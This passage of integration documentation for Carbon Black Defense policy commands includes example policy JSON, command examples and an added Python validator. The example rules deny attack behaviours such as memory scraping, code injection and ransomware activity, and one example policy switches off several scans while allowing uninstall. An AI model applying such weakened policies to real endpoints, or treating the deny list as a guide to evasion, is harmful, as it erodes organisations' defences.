          "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 }
        },
        "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } },
        "updateServers": {
          "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ],
          "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ]
        }
      },
      "directoryActionRules": [
        { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" },
        { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" },
        { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" }
      ],
      "id": -1,
      "rules": [
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false },
        { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false },
        { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false },
        { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false },
        { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false },
        { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false }
      ],
      "sensorSettings": [
        { "name": "SHOW_UI", "value": "true" },
        { "name": "BACKGROUND_SCAN", "value": "true" },
        { "name": "POLICY_ACTION_OVERRIDE", "value": "true" },
        { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." },
        { "name": "LOGGING_LEVEL", "value": "false" },
        { "name": "ALLOW_UNINSTALL", "value": "true" },
        { "name": "QUARANTINE_DEVICE", "value": "false" },
        { "name": "RATE_LIMIT", "value": "0" },
        { "name": "CONNECTION_LIMIT", "value": "0" },
        { "name": "QUEUE_SIZE", "value": "100" },
        { "name": "LEARNING_MODE", "value": "0" },
        { "name": "SCAN_NETWORK_DRIVE", "value": "true" },
        { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" },
        { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" },
        { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" },
        { "name": "DELAY_EXECUTE", "value": "true" },
        { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" },
        { "name": "HASH_MD5", "value": "false" },
        { "name": "SCAN_LARGE_FILE_READ", "value": "false" },
        { "name": "SHOW_FULL_UI", "value": "true" },
        { "name": "HELP_MESSAGE", "value": "CarbonBlack" },
        { "name": "SECURITY_CENTER_OPT", "value": "true" },
        { "name": "CB_LIVE_RESPONSE", "value": "true" },
        { "name": "UNINSTALL_CODE", "value": "false" }
      ]
    },
    "priorityLevel": "LOW",
    "version": 2
  }
}
```
The policy argument is a single JSON value; the line breaks inside it are for readability only.
Context Example
CarbonBlackDefense:{} 1 item CreatePolicy:{} 1 item PolicyId:21356
Human Readable Output
PolicyId | 21356 |
---|
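Both cbd-create-policy and cbd-update-policy take a raw policy object and return only "Request Success" or an error, so mistakes in the object (a rule missing a field, duplicate rule IDs, a sensor setting whose value is not a string, a directoryActionRules path such as the "sadf" in the example above) surface late and at the server. The following is an added example, written for this page and not part of the Demisto integration or of Carbon Black's API, that checks a policy object locally before it is submitted. It encodes only the structure visible in the policy objects on this page; the accepted values for action and application type are taken from the examples here and are an assumption, not the product's full list.

```python
"""Local sanity check for a Cb Defense policy object (added example, not integration code)."""
from typing import Any, Dict, List

# Top-level keys every policy object shown on this page carries.
REQUIRED_POLICY_KEYS = {"avSettings", "directoryActionRules", "id", "rules", "sensorSettings"}
RULE_KEYS = {"action", "application", "id", "operation", "required"}
# Values seen in the examples on this page (assumed, not exhaustive).
RULE_ACTIONS = {"DENY", "TERMINATE", "IGNORE", "ALLOW"}
APPLICATION_TYPES = {"REPUTATION", "NAME_PATH"}


def validate_policy(policy: Dict[str, Any]) -> List[str]:
    """Return a list of problems; an empty list means the object looks submittable."""
    problems: List[str] = []

    missing = REQUIRED_POLICY_KEYS - set(policy)
    if missing:
        problems.append(f"missing top-level keys: {sorted(missing)}")

    # Rules: complete, well-typed, unique ids (update/delete address rules by id).
    seen_ids = set()
    for i, rule in enumerate(policy.get("rules", [])):
        missing = RULE_KEYS - set(rule)
        if missing:
            problems.append(f"rules[{i}] missing {sorted(missing)}")
            continue
        if rule["action"] not in RULE_ACTIONS:
            problems.append(f"rules[{i}] unknown action {rule['action']!r}")
        app = rule["application"]
        if not isinstance(app, dict) or set(app) != {"type", "value"}:
            problems.append(f"rules[{i}] application must be {{type, value}}")
        elif app["type"] not in APPLICATION_TYPES:
            problems.append(f"rules[{i}] unknown application type {app['type']!r}")
        if not isinstance(rule["required"], bool):
            problems.append(f"rules[{i}] required must be a JSON boolean")
        if rule["id"] in seen_ids:
            problems.append(f"rules[{i}] duplicate rule id {rule['id']}")
        seen_ids.add(rule["id"])

    # Sensor settings: name/value pairs with string values (as the server returns
    # them), each name at most once.
    seen_names = set()
    for i, setting in enumerate(policy.get("sensorSettings", [])):
        if set(setting) != {"name", "value"}:
            problems.append(f"sensorSettings[{i}] must be exactly {{name, value}}")
            continue
        if not isinstance(setting["value"], str):
            problems.append(f"sensorSettings[{i}] ({setting['name']}) value must be a string")
        if setting["name"] in seen_names:
            problems.append(f"sensorSettings[{i}] duplicate setting {setting['name']}")
        seen_names.add(setting["name"])

    # Directory action rules need a path pattern; a bare token is almost always a typo.
    for i, rule in enumerate(policy.get("directoryActionRules", [])):
        path = rule.get("path", "")
        if not any(sep in path for sep in ("\\", "/")):
            problems.append(f"directoryActionRules[{i}] path {path!r} does not look like a path")

    return problems


# Constructed minimal policy, shaped like the cbd-get-policy output on this page.
MINIMAL_POLICY: Dict[str, Any] = {
    "avSettings": {
        "apc": {"enabled": False, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4},
        "features": [{"enabled": True, "name": "ONDEMAND_SCAN"}],
    },
    "directoryActionRules": [],
    "id": -1,
    "rules": [
        {"action": "DENY", "application": {"type": "REPUTATION", "value": "KNOWN_MALWARE"},
         "id": 1, "operation": "RUN", "required": True},
    ],
    "sensorSettings": [{"name": "CB_LIVE_RESPONSE", "value": "false"}],
}


if __name__ == "__main__":
    for problem in validate_policy(MINIMAL_POLICY) or ["policy looks submittable"]:
        print(problem)
```

Run the check on the object you are about to pass as the policy argument, and only call cbd-create-policy or cbd-update-policy when it returns an empty list; a rejected update is cheaper to find here than by reading "Request Success" back from a server that silently dropped a malformed rule.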
Update a policy
Updates an existing policy.
Base Command
cbd-update-policy
Input
Parameter | Description |
description | Policy description. |
name | A single-line name for the policy. |
priorityLevel | Priority level associated with sensors assigned to this policy (for example LOW or MEDIUM, as in the examples on this page). |
id | The ID of the policy to update. |
policy | JSON object containing the full policy details. Make sure a valid policy object is passed; the cbd-get-policy output above shows the expected shape. |
Context Output
There is no context output for this command.
Command Example
```
!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={
  "knownBadHashAutoDeleteDelayMs": null,
  "directoryActionRules": [],
  "rules": [],
  "id": -1,
  "sensorSettings": [
    { "name": "ALLOW_UNINSTALL", "value": "true" },
    { "name": "ALLOW_UPLOADS", "value": "false" },
    { "name": "SHOW_UI", "value": "false" },
    { "name": "ENABLE_THREAT_SHARING", "value": "true" },
    { "name": "QUARANTINE_DEVICE", "value": "false" },
    { "name": "LOGGING_LEVEL", "value": "NORMAL" },
    { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined. Please contact your administrator." },
    { "name": "SET_SENSOR_MODE", "value": "0" },
    { "name": "SENSOR_RESET", "value": "0" },
    { "name": "BACKGROUND_SCAN", "value": "false" },
    { "name": "POLICY_ACTION_OVERRIDE", "value": "true" },
    { "name": "HELP_MESSAGE", "value": "" },
    { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" },
    { "name": "HASH_MD5", "value": "false" },
    { "name": "SCAN_LARGE_FILE_READ", "value": "false" },
    { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "false" },
    { "name": "DELAY_EXECUTE", "value": "false" },
    { "name": "SCAN_NETWORK_DRIVE", "value": "false" },
    { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" },
    { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" },
    { "name": "SHOW_FULL_UI", "value": "false" },
    { "name": "SECURITY_CENTER_OPT", "value": "false" },
    { "name": "CB_LIVE_RESPONSE", "value": "false" },
    { "name": "UNINSTALL_CODE", "value": "false" }
  ],
  "avSettings": {
    "signatureUpdate": { "schedule": { "initialRandomDelayHours": 4, "fullIntervalHours": 0, "intervalHours": 4 } },
    "features": [
      { "enabled": false, "name": "SIGNATURE_UPDATE" },
      { "enabled": false, "name": "ONACCESS_SCAN" },
      { "enabled": true, "name": "ONDEMAND_SCAN" }
    ],
    "updateServers": {
      "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ],
      "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ]
    },
    "apc": { "maxExeDelay": 45, "riskLevel": 4, "enabled": false, "maxFileSize": 4 },
    "onAccessScan": { "profile": "NORMAL" },
    "onDemandScan": {
      "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN",
      "schedule": { "startHour": 0, "recoveryScanIfMissed": true, "days": null, "rangeHours": 0 }
    }
  }
}
```
The policy argument is a single JSON value; the line breaks inside it are for readability only.
Human Readable Output
Request Success
Delete a policy
Deletes a specified policy.
Base Command
cbd-delete-policy
Input
Parameter | Description |
policyId | Policy ID |
Context Output
There is no context output for this command.
Human Readable Output
Request Success
Add a rule to a policy
Adds a specified rule to a specified policy.
Base Command
cbd-add-rule-to-policy
Input
Parameter | Description |
action | Rule action (the examples on this page use DENY, TERMINATE, IGNORE and ALLOW). |
operation | Operation the rule applies to (for example RUN, NETWORK, RANSOM, INVOKE_SCRIPT, as in the examples on this page). |
required | Whether the rule is required (true or false). |
id | Rule ID. Rules are addressed by this ID when later updated or deleted. |
type | Application type: REPUTATION or NAME_PATH in the examples on this page. |
value | Application value: a reputation (for example KNOWN_MALWARE, COMPANY_BLACK_LIST) when type is REPUTATION, or a path pattern when type is NAME_PATH. |
policyId | ID of the policy to add the rule to. |
Context Output
There is no context output for this command.
Command Example
!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"
Human Readable Output
Request Success
Delete a rule from a policy
Deletes a specified rule from a specified policy.
Base Command
cbd-delete-rule-from-policy
Input
Parameter | Description |
policyId | ID of the policy to delete the rule from |
ruleId | ID of the rule to delete |
Context Output
There is no context output for this command.
Command Example
!cbd-delete-rule-from-policy ruleId=2 policyId=21355
Human Readable Output
Request Success
Update a rule in a policy
Updates a rule in a specified policy.
Base Command
cbd-update-rule-in-policy
Input
Parameter | Description |
action | Rule action (the examples on this page use DENY, TERMINATE, IGNORE and ALLOW). |
operation | Operation the rule applies to (for example RUN, NETWORK, RANSOM, INVOKE_SCRIPT, as in the examples on this page). |
required | Whether the rule is required (true or false). |
id | ID of the existing rule to update. |
type | Application type: REPUTATION or NAME_PATH in the examples on this page. |
value | Application value: a reputation (for example KNOWN_MALWARE, COMPANY_BLACK_LIST) when type is REPUTATION, or a path pattern when type is NAME_PATH. |
policyId | ID of the policy that contains the rule. |
Context Output
There is no context output for this command.
Command Example
!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST
Human Readable Output
Request Success
Set a policy
Sets individual fields of a specified policy by field path, instead of resubmitting the whole policy object as cbd-update-policy does.
Base Command
cbd-set-policy
Input
Parameter | Description |
keyValue | A JSON object of key-value pairs. Each key is the field path within the policy object to update, and its value is the new value for that field. |
policy | The policy to set the fields on. |
Context Output
There is no context output for this command.